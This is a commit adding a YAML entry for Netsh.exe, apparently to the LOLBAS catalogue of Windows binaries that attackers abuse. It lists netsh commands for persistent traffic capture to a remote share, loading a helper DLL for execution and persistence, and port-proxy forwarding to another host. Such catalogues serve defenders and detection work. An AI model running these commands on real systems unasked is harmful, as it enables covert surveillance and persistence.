MD files generate from Script, and adjustments to readme

This commit is contained in:
Oddvar Moe
2018-09-14 15:48:52 +02:00
parent eef9e78be8
commit c949e100bd
221 changed files with 2729 additions and 158 deletions

26
yml/OSBinaries/Netsh.yml Normal file
View File

@@ -0,0 +1,26 @@
---
Name: Netsh.exe
Description: Execute, Surveillance
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: |
netsh.exe trace start capture=yes filemode=append persistent=yes tracefile=\\server\share\file.etl IPv4.Address=!(<IPofRemoteFileShare>)
netsh.exe trace show status
Description: Capture network traffic on remote file share.
- Command: netsh.exe add helper C:\Path\file.dll
Description: Load (execute) NetSh.exe helper DLL file.
- Command: netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1
Description: Forward traffic from the listening address and proxy to a remote system.
Full Path:
- C:\Windows\System32
- C:\Windows\SysWOW64
Code Sample: []
Detection: []
Resources:
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md
- https://attack.mitre.org/wiki/Technique/T1128
- https://twitter.com/teemuluotio/status/990532938952527873
Notes: ''